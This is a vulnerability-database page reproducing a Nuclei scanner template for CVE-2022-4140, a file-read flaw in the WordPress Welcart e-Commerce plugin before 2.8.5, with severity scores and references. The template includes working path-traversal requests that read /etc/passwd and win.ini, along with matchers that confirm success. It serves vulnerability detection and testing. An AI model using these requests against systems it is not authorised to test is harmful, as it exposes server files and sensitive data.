Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-4140HistoryMar 31, 2023 - 11:28 a.m.
WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access
2023-03-3111:28:24
ProjectDiscovery
github.com
4
cve
cve2022
usc-e-shop
wpscan
wordpress
lfi
unauthenticated
collne
arbitrary
file access
plugin
fix
security vulnerability
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.013 Low
EPSS
Percentile
85.8%
WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2022-4140
info:
name: WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access
author: theamanrawat
severity: high
description: |
WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can access sensitive files on the server, potentially exposing sensitive information.
remediation: Fixed in version 2.8.5.
reference:
- https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7
- https://wordpress.org/plugins/usc-e-shop/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4140
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-4140
cwe-id: CWE-552
epss-score: 0.00932
epss-percentile: 0.82572
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: collne
product: welcart_e-commerce
framework: wordpress
tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200
# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950Related
nvd
nvd
CVE-2022-4140
2023-01-02 22:15:16
prion
prion
Input validation
2023-01-02 22:15:00
jvn
jvn
cvelist
cvelist
cve
cve
CVE-2022-4140
2023-01-02 22:15:16
wpvulndb
wpvulndb
Welcart e-Commerce < 2.8.5 - Unauthenticated Arbitrary File Access
2022-12-05 00:00:00
wpexploit
wpexploit
Welcart e-Commerce < 2.8.5 - Unauthenticated Arbitrary File Access
2022-12-05 00:00:00
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.013 Low
EPSS
Percentile
85.8%
Related for NUCLEI:CVE-2022-4140